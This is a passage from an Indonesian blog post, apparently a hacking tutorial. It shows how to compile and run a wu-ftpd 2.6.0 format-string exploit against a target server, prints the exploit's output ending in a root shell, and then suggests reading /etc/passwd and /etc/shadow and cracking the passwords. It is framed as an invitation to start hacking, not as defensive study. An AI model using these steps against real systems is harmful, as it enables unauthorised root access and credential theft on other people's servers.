jalan pada wu-ftp Cara compilenya adalah sbb : #gcc wu-ftp.c -o wu-ftp Selanjutnya mulai ngehack #./wu-ftp -s0 -t 10.1.xx.xx Target: 10.1.xx.xx (ftp/): RedHat 6.2 (?) with
    wuftpd
    2.6.0(1) from rpm
    Return Address: 0x08075844, AddrRetAddr: 0xbfffb028,
    Shellcode: 152

    loggin into system..
    USER ftp
    331 Guest login ok, send your complete e-mail address as
    password.
    PASS
    230 Guest login ok, access restrictions apply.
    STEP 2 : Skipping, magic number already exists:
    [87,01:03,02:01,01:02,04]
    STEP 3 : Checking if we can reach our return address by format
    string
    STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028
    ^C me now)
    STEP 5 : Sending code.. this will take about 10 seconds.
    Press ^\ to leave shell
    blah blah
    blah
    uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

    Nah lihat kita udah dapat shell root di server tersebut
    selanjutnya terserah anda coba perintah-perintah ls -al

    atau

    cat /etc/passwd

    atau

    cat /etc/shadow

    atau terserah anda, saya menyarankan agar tidak mengganggu
    apalagi mengubah, kalo memang perlu passwd ambil /etc/passwd
    atau /etc/shadow Trus tinggal kamu crack, banyak kok sourcenya
    untuk crack passwd Selamat Mencoba

    Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Creating Website

    0 komentar:

    Posting Komentar

     
    Support : Creating Website | Tutorq Template | Template
    Copyright © 2011. FAROUQ'S - All Rights Reserved
    Template Modify by Creating Website
    Proudly powered by Blogger